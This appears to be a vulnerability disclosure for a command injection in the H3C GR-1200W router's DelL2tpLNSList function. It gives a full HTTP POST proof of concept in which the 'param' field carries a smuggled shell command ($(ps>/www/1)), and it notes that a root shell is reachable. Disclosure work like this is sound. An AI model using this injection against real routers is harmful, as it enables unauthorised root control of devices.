Skip to content
main
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?

Latest commit

 

Git stats

Files

Permalink
Failed to load latest commit information.
Type
Name
Latest commit message
Commit time
img
 
 
 
 

H3C GR-1200W (<=MiniGRW1A0V100R006) Has an command injection vulnerability

Overview

Product Information

H3C GR-1200W MiniGRW1A0V100R006 router, the latest version of simulation overview:

image-20220724213031606

Vulnerability details

The H3C GR-1200W (<=MiniGRW1A0V100R006) router was found to contain a command insertion vulnerability in DelL2tpLNSList.This vulnerability allows an attacker to execute arbitrary commands through the "param" parameter.

image-20220724213415656

In the DelL2tpLNSList function, it format the param parameter we entered into V13 through the snprintf function, and execute our command through the system function. We can execute our orders through $(command).

Recurring vulnerabilities and POC

In order to reproduce the vulnerability, the following steps can be followed:

  1. Boot the firmware by qemu-system or other ways (real machine)
  2. Attack with the following POC attacks
POST /goform/aspForm HTTP/1.1
Host: 192.168.0.124:80
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: https://121.226.152.63:8443/router_password_mobile.asp
Content-Type: application/x-www-form-urlencoded
Content-Length: 553
Origin: https://192.168.0.124:80
DNT: 1
Connection: close
Cookie: JSESSIONID=5c31d502
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

CMD=DelL2tpLNSList&param=1; $(ps>/www/1);

image-20220725142032977

image-20220725142137070

The above figure shows the POC attack effect

image-20220724220055672

Finally, you also can write exp to get a stable root shell.